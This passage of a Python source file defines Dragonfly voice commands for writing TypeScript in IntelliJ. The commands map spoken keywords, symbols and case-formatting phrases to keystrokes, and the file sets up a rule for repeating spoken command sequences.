"(T|tango) ": Text("t"),
"(U|uniform) ": Text("u"),
"(V|victor) ": Text("v"),
"(W|whiskey) ": Text("w"),
"(X|x-ray) ": Text("x"),
"(Y|yankee) ": Text("y"),
"(Z|zulu) ": Text("z"),
# Typescript keywords, defined as commands so case etc is correct
"abstract": Text("abstract "),
"as": Text("as "),
"async": Text("async "),
"await": Text("await "),
"break": Text("break") + Key("enter"),
"case": Text("case :") + Key("left"),
"catch": Text("catch(err) {") + Key("enter"),
"class <text>": Text("class ") + Function(lib.format.pascal_case_text) + Text(" {") + Key("enter"),
"const <text>": Text("const ") + Function(lib.format.camel_case_text),
"constructor": Text("constructor () {") + Key("left:3"),
"continue": Text("continue") + Key("enter"),
"declare": Text("declare "),
"default": Text("default "),
"delete <text>": Text("delete ") + Function(lib.format.camel_case_text),
"do": Text("do "),
"else": Text(" else {") + Key("enter"),
"enum <text>": Text("enum ") + Function(lib.format.pascal_case_text) + Text(" {") + Key("enter"),
"export": Text("export "),
"extends <text>": Text("extends ") + Function(lib.format.pascal_case_text),
"false": Text("false"),
"finally": Text("finally {") + Key("enter"),
"for of <text>": Text("for (const elem of ") + Function(lib.format.pascal_case_text) + Text("){"),
"for in <text>": Text("for (const key of ") + Function(lib.format.pascal_case_text) + Text("){"),
"function <text>": Text("function ") + Function(lib.format.pascal_case_text) + Text("() {") + Key("enter") + Key("cs-m") + Key("left:2"),
"from": Text("from ''") + Key("left"),
"get <text>": Text("get ") + Function(lib.format.camel_case_text) + Text("() {") + Key("enter") + Text("return "),
"if": Text("if () {") + Key("enter") + Key("cs-m") + Key("left"),
"implements <text>": Text("implements ") + Function(lib.format.pascal_case_text),
"import": Text("import "),
"in": Text("in "),
"interface <text>": Text("interface ") + Function(lib.format.pascal_case_text) + Text(" {") + Key("enter"),
"instance of": Text("instanceof "),
"let <text>": Text("let ") + Function(lib.format.camel_case_text),
"new": Text("new "),
"null": Text("null "),
"package": Text("package "),
"private <text>": Text("private ") + Function(lib.format.camel_case_text),
"protected": Text("protected "),
"public": Text("public "),
"read only": Text("readonly "),
"return": Text("return "),
"set <text>": Text("set ") + Function(lib.format.camel_case_text) + Text("() {") + Key("enter") + Key("cs-m") + Key("left:2"),
"static": Text("static "),
"super": Text("super("),
"switch": Text("switch () {") + Key("enter") + Text("case :") + Key("enter") + Text("break") + Key("cs-m") + Key("left:2"),
"this": Text("this"),
"true": Text("true"),
"try": Text("try {") + Key("enter") + Key("down:2") + Text("catch (err) {") + Key("enter") + Key("cs-m") + Key("up"),
"type": Text("type "),
"type of": Text("typeof"),
"undefined": Text("undefined"),
"void": Text("void"),
"while": Text("while () {") + Key("enter") + Key("cs-m") + Key("left:2"),
# common methods
"log": Text("console.log(\""),
# common types
"any": Text("any"),
"boolean": Text("boolean"),
"map": Text("Map"),
"number": Text("number"),
"new map": Text("Map<>(") + Key("left:2"),
"string": Text("string"),
# symbols, punctuation, etc.
"bar": Text(" | "),
"equal to": Text(" === "),
"equals": Text(" = "),
"greater than": Text(" > "),
"greater than or equal 2": Text(" >= "),
"less than": Text(" < "),
"less than or equal 2": Text(" <= "),
"not equal to": Text(" !== "),
"angle bracket": Key("langle"),
"close angle bracket": Key("rangle"),
"square bracket": Text("["),
"close square bracket": Text("]"),
"brace": Key("lbrace"),
"close brace": Key("rbrace"),
"paren": Key("lparen"),
"close paren": Key("rparen"),
"quote": Key("dquote"),
"single quote": Key("squote"),
"colon [<n>]": Key("colon:%(n)d"),
"semi-colon [<n>]": Key("semicolon:%(n)d"),
"comma [<n>]": Key("comma:%(n)d"),
"dot [<n>]": Key("dot:%(n)d"),
"(dash|hyphen|minus) [<n>]": Key("hyphen:%(n)d"),
"underscore [<n>]": Key("underscore:%(n)d"),
"plus": Text(" + "),
"bang": Text("!"),
"at": Text("@"),
# Formatting <n> words to the left of the cursor.
"camel case <n>": Function(lib.format.camel_case_count),
"camel case <text>": Function(lib.format.camel_case_text),
"pascal case <n>": Function(lib.format.pascal_case_count),
"pascal case <text>": Function(lib.format.pascal_case_text),
"snake case <n>": Function(lib.format.snake_case_count),
"snake case <text>": Function(lib.format.snake_case_text),
"squash <n>": Function(lib.format.squash_count),
"expand <n>": Function(lib.format.expand_count),
"uppercase <n>": Function(lib.format.uppercase_count),
"uppercase <text>": Function(lib.format.uppercase_text),
"lowercase <n>": Function(lib.format.lowercase_count),
"lowercase <text>": Function(lib.format.lowercase_text),
# Format dictated words. See the formatMap for all available types.
# Ex: "camel case my new variable" -> "myNewVariable"
# Ex: "snake case my new variable" -> "my_new_variable"
# Ex: "uppercase squash my new hyphen variable" -> "MYNEW-VARIABLE"
# "<formatType> <text>": Function(lib.format.format_text),
# editing
# For writing words that would otherwise be characters or commands.
# Ex: "period", tab", "left", "right", "home", select word
"cut": Key("c-x"),
"dictate <text>": Text("%(text)s"),
"duplicate line": Key("c-d"),
"escape": Key("escape"),
"format": Key("csa-p"),
"paste": Key("c-v"),
"save": Key("c-s"),
"undo": Key("c-z"),
},
namespace={
"Key": Key,
"Text": Text,
}
)
#
class KeystrokeRule(MappingRule):
exported = False
mapping = grammarCfg.cmd.map
extras = [
IntegerRef("n", 1, 1000),
IntegerRef("m", 1, 1000),
Dictation("text"),
Dictation("text2"),
]
defaults = {
"n": 1,
}
alternatives = []
alternatives.append(RuleRef(rule=KeystrokeRule()))
single_action = Alternative(alternatives)
sequence = Repetition(single_action, min=1, max=8, name="sequence")
class RepeatRule(CompoundRule):
# Here we define this rule's spoken-form and special elements.
spec = "<sequence> [[[and] repeat [that]] <n> times]"
extras = [
sequence, # Sequence of actions defined above.
IntegerRef("n", 1, 1000), # Times to repeat the sequence.
]
defaults = {
"n": 1, # Default repeat count.
}
def _process_recognition(self, node, extras): # @UnusedVariable
sequence = extras["sequence"] # A sequence of actions.
count = extras["n"] # An integer repeat count.
for i in range(count): # @UnusedVariable
for action in sequence:
action.execute()
grammar = Grammar("IntelliJ Typescript edit", context=AppContext(executable="idea64"))
grammar.add_rule(RepeatRule()) # Add the top-level rule.
grammar.load() # Load the grammar.
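# Teardown following the usual Dragonfly/Natlink module convention (a sketch,
# assuming the standard loader behaviour): unload() is called when the module is
# reloaded or removed, and releases the grammar.
def unload():
    global grammar
    if grammar:
        grammar.unload()
    grammar = None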
# ---------------------------------------------------------------------------
# Create this module's grammar and the context under which it'll be active.
# grammar_context = AppContext(executable="idea64")
# grammar = Grammar("idea", |